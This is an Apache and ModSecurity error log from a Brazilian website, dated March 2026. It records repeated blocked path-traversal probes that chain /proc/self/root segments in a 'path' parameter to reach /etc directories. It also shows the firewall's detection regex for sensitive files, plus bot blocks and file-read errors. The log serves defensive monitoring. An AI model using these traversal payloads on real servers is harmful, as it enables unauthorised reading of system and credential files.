[Wed Mar 18 13:32:02.544868 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:44940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTgta6ubjKNq_cu4a6fwAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:32:26.819740 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:44952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTmeyqAr6etmhZHNri2AAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:32:28.487338 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.241.31:34438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTnEzinOy1jxa1j4czGwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:32:29.672920 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:34444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTnUzinOy1jxa1j4czHgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:32:31.634779 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:52426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTnsdf6f5d65gmYZTxOQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:32:40.826107 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:34458] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTqOyqAr6etmhZHNri5QAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:32:55.487356 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:46884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTtymAPhZkrhU8w4mKOAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:33:00.667252 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:38106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTvAkwaGbbGflqUZAtPgAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:33:07.539382 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:40976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTw8df6f5d65gmYZTxRgAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:33:25.691110 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.241.31:48180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrT1ew_le52K8_3pV36uQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:33:26.177904 2026] [mime_magic:error] [pid 29882:tid 140411666392832] (70014)End of file found: [client 57.141.18.42:34362] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:33:30.039003 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:40988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrT2gbLMZ6AikZjR9XcMgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:33:52.500484 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:44948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrT8OyqAr6etmhZHNrjKwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:34:11.362717 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.244.43:60472] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrUA8df6f5d65gmYZTxdQAAAsQ"]
[Wed Mar 18 13:34:12.682900 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.228.61:49606] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrUBNa6ubjKNq_cu4a6wQAAA0w"]
[Wed Mar 18 13:34:13.865019 2026] [mime_magic:error] [pid 15826:tid 140411590858496] (70014)End of file found: [client 57.141.18.36:35838] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 13:34:17.271077 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:59312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUCQkwaGbbGflqUZAtlAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:34:18.275925 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:44948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUCuyqAr6etmhZHNrjTgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:34:18.589023 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:51276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUCimAPhZkrhU8w4mKVQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:34:19.911505 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:53246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUC8df6f5d65gmYZTxegAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:34:21.054538 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:53256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUDfu8EFLIOrSqIpsfRwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:14.621034 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:53264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUQuyqAr6etmhZHNrjrwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:35:15.932609 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:53876] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrUQ0zinOy1jxa1j4czsQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:35:17.248167 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:53890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrURda6ubjKNq_cu4a62wAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:35:18.435694 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:53896] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrURkzinOy1jxa1j4cztQAAAQs"], referer: 